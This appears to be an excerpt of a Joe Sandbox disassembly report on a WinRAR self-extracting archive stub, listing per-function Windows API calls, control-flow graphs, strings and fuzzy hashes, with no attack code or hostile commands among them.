                                                                          • Instruction ID: 7e2d63059b76e88b6daf6f92d0e3a2bbec1750cd42b4112dacc2afadd24ad6c9
                                                                          • Opcode Fuzzy Hash: f43d68e9dd4ac5c18b38eac0f9adb40cf2c5ba6475994696d7237d2a22d44daf
                                                                          • Instruction Fuzzy Hash: 64822A70D04245AEDF15DB64CC81BFABBB9AF05350F0841B9D8899B2C3DB745A89FB60
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F1B7E5
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1B8D1
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B8EF
                                                                          • IsDialogMessageW.USER32(?,?), ref: 00F1B902
                                                                          • TranslateMessage.USER32(?), ref: 00F1B910
                                                                          • DispatchMessageW.USER32(?), ref: 00F1B91A
                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00F1B93D
                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00F1B960
                                                                          • GetDlgItem.USER32(?,00000068), ref: 00F1B983
                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1B99E
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00F335F4), ref: 00F1B9B1
                                                                            • Part of subcall function 00F1D453: _wcslen.LIBCMT ref: 00F1D47D
                                                                          • SetFocus.USER32(00000000), ref: 00F1B9B8
                                                                          • _swprintf.LIBCMT ref: 00F1BA24
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                            • Part of subcall function 00F1D4D4: GetDlgItem.USER32(00000068,00F5FCB8), ref: 00F1D4E8
                                                                            • Part of subcall function 00F1D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00F1AF07,00000001,?,?,00F1B7B9,00F3506C,00F5FCB8,00F5FCB8,00001000,00000000,00000000), ref: 00F1D510
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1D51B
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00F335F4), ref: 00F1D529
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D53F
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F1D559
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D59D
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F1D5AB
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D5BA
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D5E1
                                                                            • Part of subcall function 00F1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00F343F4), ref: 00F1D5F0
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00F1BA68
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00F1BA90
                                                                          • GetTickCount.KERNEL32 ref: 00F1BAAE
                                                                          • _swprintf.LIBCMT ref: 00F1BAC2
                                                                          • GetLastError.KERNEL32(?,00000011), ref: 00F1BAF4
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00F1BB43
                                                                          • _swprintf.LIBCMT ref: 00F1BB7C
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00F1BBD0
                                                                          • GetCommandLineW.KERNEL32 ref: 00F1BBEA
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00F1BC47
                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00F1BC6F
                                                                          • Sleep.KERNEL32(00000064), ref: 00F1BCB9
                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00F1BCE2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F1BCEB
                                                                          • _swprintf.LIBCMT ref: 00F1BD1E
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1BD7D
                                                                          • SetDlgItemTextW.USER32(?,00000065,00F335F4), ref: 00F1BD94
                                                                          • GetDlgItem.USER32(?,00000065), ref: 00F1BD9D
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F1BDAC
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F1BDBB
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1BE68
                                                                          • _wcslen.LIBCMT ref: 00F1BEBE
                                                                          • _swprintf.LIBCMT ref: 00F1BEE8
                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F1BF32
                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00F1BF4C
                                                                          • GetDlgItem.USER32(?,00000068), ref: 00F1BF55
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00F1BF6B
                                                                          • GetDlgItem.USER32(?,00000066), ref: 00F1BF85
                                                                          • SetWindowTextW.USER32(00000000,00F4A472), ref: 00F1BFA7
                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00F1C007
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1C01A
                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00F1C0BD
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00F1C197
                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00F1C1D9
                                                                            • Part of subcall function 00F1C73F: __EH_prolog.LIBCMT ref: 00F1C744
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1C1FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                          • API String ID: 3445078344-2238251102

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00F1087C
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F1088E
                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F108BF
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F10B69
                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F10B83
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F10B93
                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00F33C7C,00000000), ref: 00F10BB1
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F10C09
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F10C1E
                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00F33C7C,?,00000000,?,00000800), ref: 00F10C72
                                                                          • GetFileAttributesW.KERNELBASE(?,?,00F33C7C,00000800,?,00000000,?,00000800), ref: 00F10C9C
                                                                          • GetFileAttributesW.KERNEL32(?,?,00F33D44,00000800), ref: 00F10CD8
                                                                            • Part of subcall function 00F1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                            • Part of subcall function 00F1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          • _swprintf.LIBCMT ref: 00F10D4A
                                                                          • _swprintf.LIBCMT ref: 00F10D96
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • AllocConsole.KERNEL32 ref: 00F10D9E
                                                                          • GetCurrentProcessId.KERNEL32 ref: 00F10DA8
                                                                          • AttachConsole.KERNEL32(00000000), ref: 00F10DAF
                                                                          • _wcslen.LIBCMT ref: 00F10DC4
                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F10DD5
                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00F10DDC
                                                                          • Sleep.KERNEL32(00002710), ref: 00F10DE7
                                                                          • FreeConsole.KERNEL32 ref: 00F10DED
                                                                          • ExitProcess.KERNEL32 ref: 00F10DF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                          • API String ID: 1207345701-3298887752

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F1C744
                                                                            • Part of subcall function 00F1B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F1B3FB
                                                                          • _wcslen.LIBCMT ref: 00F1CA0A
                                                                          • _wcslen.LIBCMT ref: 00F1CA13
                                                                          • SetWindowTextW.USER32(?,?), ref: 00F1CA71
                                                                          • _wcslen.LIBCMT ref: 00F1CAB3
                                                                          • _wcsrchr.LIBVCRUNTIME ref: 00F1CBFB
                                                                          • GetDlgItem.USER32(?,00000066), ref: 00F1CC36
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00F1CC46
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,00F4A472), ref: 00F1CC54
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F1CC7F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 2804936435-312220925
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F0DA70
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F0DAAC
                                                                            • Part of subcall function 00F0C29A: _wcslen.LIBCMT ref: 00F0C2A2
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                            • Part of subcall function 00F11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F0BAE9,00000000,?,?,?,0001045C), ref: 00F11BA0
                                                                          • _wcslen.LIBCMT ref: 00F0DDE9
                                                                          • __fprintf_l.LIBCMT ref: 00F0DF1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                          • API String ID: 566448164-801612888

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00F1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                            • Part of subcall function 00F1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                            • Part of subcall function 00F1B568: IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                            • Part of subcall function 00F1B568: TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                            • Part of subcall function 00F1B568: DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          • GetDlgItem.USER32(00000068,00F5FCB8), ref: 00F1D4E8
                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00F1AF07,00000001,?,?,00F1B7B9,00F3506C,00F5FCB8,00F5FCB8,00001000,00000000,00000000), ref: 00F1D510
                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1D51B
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00F335F4), ref: 00F1D529
                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D53F
                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F1D559
                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D59D
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F1D5AB
                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F1D5BA
                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F1D5E1
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00F343F4), ref: 00F1D5F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Similarity
                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                          • String ID: \
                                                                          • API String ID: 3569833718-2967466578

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F1D7AE
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00F1D8DE
                                                                          • ShowWindow.USER32(?,00000000), ref: 00F1D91D
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00F1D959
                                                                          • CloseHandle.KERNEL32(?), ref: 00F1D97F
                                                                          • ShowWindow.USER32(?,00000001), ref: 00F1D9E1
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                          • String ID: .exe$.inf
                                                                          • API String ID: 36480843-3750412487

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F25695,00F25695,?,?,?,00F2ABAC,00000001,00000001,2DE85006), ref: 00F2A9B5
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F2ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00F2AA3B
                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F2AB35
                                                                          • __freea.LIBCMT ref: 00F2AB42
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          • __freea.LIBCMT ref: 00F2AB4B
                                                                          • __freea.LIBCMT ref: 00F2AB70
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1414292761-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00F23C35,?,?,00F62088,00000000,?,00F23D60,00000004,InitializeCriticalSectionEx,00F36394,InitializeCriticalSectionEx,00000000), ref: 00F23C03
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3664257935-2084034818

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00F1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                            • Part of subcall function 00F1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          • OleInitialize.OLE32(00000000), ref: 00F1AC2F
                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1AC66
                                                                          • SHGetMalloc.SHELL32(00F48438), ref: 00F1AC70
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                          • String ID: riched20.dll$3Ro
                                                                          • API String ID: 3498096277-3613677438

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00F07760,?,00000005,?,00000011), ref: 00F0995F
                                                                          • GetLastError.KERNEL32(?,?,00F07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F0996C
                                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00F07760,?,00000005,?), ref: 00F099A2
                                                                          • GetLastError.KERNEL32(?,?,00F07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F099AA
                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F099F9
                                                                          Similarity
                                                                          • API ID: File$CreateErrorLast$Time
                                                                          • String ID:
                                                                          • API String ID: 1999340476-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                          • IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                          • TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                          • DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          Similarity
                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 1266772231-0
                                                                          • Opcode ID: cad5d8fb7999d6f2cd258970fcca0cb2297265f8d8fc0d7208b9f3d9b67aa2d4
                                                                          • Instruction ID: ef19848cc7d21e35e400670f03cfa2ee6764325419ce2e8ab09e438b41f3221e
                                                                          • Opcode Fuzzy Hash: cad5d8fb7999d6f2cd258970fcca0cb2297265f8d8fc0d7208b9f3d9b67aa2d4
                                                                          • Instruction Fuzzy Hash: 05F01D71E0112EBB8B209BE19C4CDDB7FACEE062A47004414F915D2010EB74D609EBB0

                                                                          Control-flow Graph

                                                                          control_flow_graph 1061 f1abab-f1abca GetClassNameW 1062 f1abf2-f1abf4 1061->1062 1063 f1abcc-f1abe1 call f11fbb 1061->1063 1064 f1abf6-f1abf9 SHAutoComplete 1062->1064 1065 f1abff-f1ac01 1062->1065 1068 f1abf1 1063->1068 1069 f1abe3-f1abef FindWindowExW 1063->1069 1064->1065 1068->1062 1069->1068
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00F1ABC2
                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F1ABF9
                                                                            • Part of subcall function 00F11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F0C116,00000000,.exe,?,?,00000800,?,?,?,00F18E3C), ref: 00F11FD1
                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F1ABE9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                          • String ID: EDIT
                                                                          • API String ID: 4243998846-3080729518
                                                                          • Opcode ID: 2f39817da64961c981ae669c5b2f62f618cdf5c9a0520d84da7acde85eed4118
                                                                          • Instruction ID: d77957c34383f5651d631547696afb68cf3f6a810675ba685ff9dc7c857d2dcf
                                                                          • Opcode Fuzzy Hash: 2f39817da64961c981ae669c5b2f62f618cdf5c9a0520d84da7acde85eed4118
                                                                          • Instruction Fuzzy Hash: 78F08232A0122C76DB3096249C09FDB766C9B86B50F484011FA05A21C0D7A4EA85A5B6

                                                                          Control-flow Graph

                                                                          control_flow_graph 1070 f09785-f09791 1071 f09793-f0979b GetStdHandle 1070->1071 1072 f0979e-f097b5 ReadFile 1070->1072 1071->1072 1073 f09811 1072->1073 1074 f097b7-f097c0 call f098bc 1072->1074 1075 f09814-f09817 1073->1075 1078 f097c2-f097ca 1074->1078 1079 f097d9-f097dd 1074->1079 1078->1079 1082 f097cc 1078->1082 1080 f097ee-f097f2 1079->1080 1081 f097df-f097e8 GetLastError 1079->1081 1084 f097f4-f097fc 1080->1084 1085 f0980c-f0980f 1080->1085 1081->1080 1083 f097ea-f097ec 1081->1083 1086 f097cd-f097d7 call f09785 1082->1086 1083->1075 1084->1085 1087 f097fe-f09807 GetLastError 1084->1087 1085->1075 1086->1075 1087->1085 1090 f09809-f0980a 1087->1090 1090->1086
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00F09795
                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F097AD
                                                                          • GetLastError.KERNEL32 ref: 00F097DF
                                                                          • GetLastError.KERNEL32 ref: 00F097FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FileHandleRead
                                                                          • String ID:
                                                                          • API String ID: 2244327787-0
                                                                          • Opcode ID: e251e34b9142f1339500ebcd550c73f131e4b8de875802685ab7d79f00fce618
                                                                          • Instruction ID: f1923afdec376ee2639d8cac74e2dbee574c05a3c8e5fb37969141ac1a28417a
                                                                          • Opcode Fuzzy Hash: e251e34b9142f1339500ebcd550c73f131e4b8de875802685ab7d79f00fce618
                                                                          • Instruction Fuzzy Hash: F4117032918204EBDF209F64CC0466937A9BB46335F508629F456852D2F7F89E44FB61

                                                                          Control-flow Graph

                                                                          control_flow_graph 1091 f2ad34-f2ad48 1092 f2ad55-f2ad70 LoadLibraryExW 1091->1092 1093 f2ad4a-f2ad53 1091->1093 1095 f2ad72-f2ad7b GetLastError 1092->1095 1096 f2ad99-f2ad9f 1092->1096 1094 f2adac-f2adae 1093->1094 1097 f2ad8a 1095->1097 1098 f2ad7d-f2ad88 LoadLibraryExW 1095->1098 1099 f2ada1-f2ada2 FreeLibrary 1096->1099 1100 f2ada8 1096->1100 1102 f2ad8c-f2ad8e 1097->1102 1098->1102 1099->1100 1101 f2adaa-f2adab 1100->1101 1101->1094 1102->1096 1103 f2ad90-f2ad97 1102->1103 1103->1101
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F23F73,00000000,00000000,?,00F2ACDB,00F23F73,00000000,00000000,00000000,?,00F2AED8,00000006,FlsSetValue), ref: 00F2AD66
                                                                          • GetLastError.KERNEL32(?,00F2ACDB,00F23F73,00000000,00000000,00000000,?,00F2AED8,00000006,FlsSetValue,00F37970,FlsSetValue,00000000,00000364,?,00F298B7), ref: 00F2AD72
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F2ACDB,00F23F73,00000000,00000000,00000000,?,00F2AED8,00000006,FlsSetValue,00F37970,FlsSetValue,00000000), ref: 00F2AD80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
